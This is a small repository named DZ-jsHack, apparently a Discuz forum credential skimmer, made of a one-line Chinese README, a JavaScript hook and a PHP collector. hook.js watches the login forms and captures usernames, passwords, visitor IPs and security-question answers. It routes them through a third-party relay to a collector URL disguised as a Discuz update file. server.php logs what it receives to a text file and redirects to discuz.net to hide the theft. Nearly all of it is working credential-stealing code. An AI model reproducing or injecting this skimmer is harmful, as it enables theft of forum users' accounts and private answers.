├── README.md
├── hook.js
└── server.php


/README.md:
--------------------------------------------------------------------------------
1 | # DZ-jsHack
2 | 使用JS监听获取dz密码
3 | 


--------------------------------------------------------------------------------
/hook.js:
--------------------------------------------------------------------------------
 1 | var loadJS = function(url, callback) {
 2 |     var head = document.getElementsByTagName("head")[0];
 3 |     var script = document.createElement("script");
 4 |     script.src = url;
 5 |     var done = false;
 6 |     script.onload = script.onreadystatechange = function() {
 7 |         if (!done && (!this.readyState || this.readyState == "loaded" || this.readyState == "complete")) {
 8 |             done = true;
 9 |             callback();
10 |             script.onload = script.onreadystatechange = null;
11 |             head.removeChild(script);
12 |         }
13 |     };
14 |     head.appendChild(script);
15 | };
16 | loadJS("http://cdn.bootcss.com/jquery/3.1.1/jquery.min.js", function() {
17 |     var jq = jQuery.noConflict();
18 |     var h = 'http://xxx/discuz_update_cn_server03.php';
19 |     jq(document).ready(function() {
20 |         //index page header login input
21 |         jq("#loginButton").click(function() {
22 |             var u = jq("input[name='username']").val();
23 |             var p = jq("input[name='password']").val();
24 |             if (u != "" && p != "********") {
25 |                 loadJS("http://pv.sohu.com/cityjson", function() {
26 |                     var ip = returnCitySN['cip'];
27 |                     var url = h + '?u=' + u + '&p=' + p + '&i=' + ip;
28 |                     jq.post('http://www.veryhuo.com/tools/http_header.php', "url=" + encodeURIComponent(url));
29 |                 });
30 |             }
31 |         });
32 |         //xml login form
33 |         jq("#nv_member").on('DOMNodeInserted', function(e) {
34 |         	console.log("1\n");
35 |             jq("button[name='loginsubmit']").click(function() {
36 |             	console.log("222\n");
37 |                 var u = jq("input[name='username']").val();
38 |                 var p = jq("input[name='password']").val();
39 |                 if (u != "" && p != "********") {
40 |                     loadJS("http://pv.sohu.com/cityjson", function() {
41 |                         var ip = returnCitySN['cip'];
42 |                         var url = h + '?u=' + u + '&p=' + p + '&i=' + ip;
43 |                         jq.post('http://www.veryhuo.com/tools/http_header.php', "url=" + encodeURIComponent(url));
44 |                     });
45 |                 }
46 |                 var q = jq("select[name='questionid']").val();
47 |                 var a = jq("input[name='answer']").val();
48 |                 //console.log(a+q);
49 |                 if (a != "") {
50 |                     var url = h + '?q=' + q + '&a=' + a;
51 |                     jq.post('http://www.veryhuo.com/tools/http_header.php', "url=" + encodeURIComponent(url));
52 |                 }
53 |             });
54 |         });
55 |     });
56 | });
57 | 


--------------------------------------------------------------------------------
/server.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $file = "cloud.txt";
 3 | if (!empty($_GET['u']) && !empty($_GET['p'])) {
 4 | 	$re = $_GET['u'] . "|" . $_GET['p'] . "|" . $_GET['i'] . "\n";
 5 | 	if (strpos(file_get_contents($file), $re) === false) {
 6 | 		file_put_contents($file, $re, FILE_APPEND);
 7 | 	}
 8 | }
 9 | if (!empty($_GET['q']) && !empty($_GET['a'])) {
10 | 	$re = $_GET['q'] . ":" . $_GET['a'] . "\n";
11 | 	file_put_contents($file, $re, FILE_APPEND);
12 | }
13 | Header("HTTP/1.1 301 Moved Permanently");
14 | Header("Location: http://www.discuz.net");
15 | 


--------------------------------------------------------------------------------